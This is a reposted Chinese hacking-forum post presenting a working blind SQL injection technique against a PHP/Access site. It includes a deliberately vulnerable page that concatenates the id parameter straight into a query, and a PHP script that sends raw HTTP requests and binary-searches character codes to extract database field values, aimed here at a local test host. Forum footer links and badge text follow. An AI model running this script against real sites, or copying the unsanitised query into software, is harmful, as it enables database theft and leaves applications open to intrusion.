|
|
PHP二分法注射猜解
作者:佚名 来源:转载 发布时间:2008-10-8 0:07:59 发布人:黑客动画吧
来源:wolvez
b.php
PHP代码
<?php
$conn = new com("ADODB.Connection");
$connstr = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=". realpath("data.mdb");
$conn->Open($connstr);
$rs = new com("ADODB.RecordSet");
$sql="select * from news where id=".$_GET[id];
$rs->Open($sql,$conn,1,1);
if(! $rs->eof) {
echo "{ok}";
} else{
echo "{no}";
}
?>
存在注射的。但是没有输出结果,只是判断是否存在。
PHP代码
<?php
error_reporting(7);
ini_set('max_execution_time', 0);
function send(){
global $host,$cmd;
//$cmd .= "";
$message = "GET /b.php?id=".$cmd." HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Host: $host\r\n";
$message .= "Connection: Close\r\n\r\n";
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
preg_match('/\{ok\}/', $resp, $pre);
if ($pre) return true;
}
function Binsearch($sql){
global $cmd;
$low="32";
$high="128";
while($low<=$high){
$mid=intval(($low+$high)/2);
$cmd= $sql."=".$mid;
echo "$mid";
if(send()){echo "Lucky\r\n";return $mid;}
$cmd= $sql."<".$mid;
if(send()){
$high=$mid-1;
echo "Bigger\r\n";
}else{
$low=$mid+1;
echo "Smaller\r\n";
}
}
return(-1);
}
$host="127.0.0.1:8080";
$sql="15%20and%20asc(left(name,1))";
echo Binsearch($sql);
?> |
|
前程无忧官网首页 有什么好的平台可以
最新的销售平台 互联网营销的平台有哪
制作网页的基本流程 网页制作和网页设
【帝国CMS】输出带序号的列表(数字排
织梦 建站 织梦网站模版后台怎么更改
云服务官网 哪些网站有免费的简历模板
如何建网站要什么条件 建网站要用什么
吉林市移动公司电话 吉林省退休人员网
|小黑屋|最新主题|手机版|微赢网络技术论坛
( 苏ICP备08020429号 )
IP卡
狗仔卡
发表于 2009-11-29 23:13:14
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡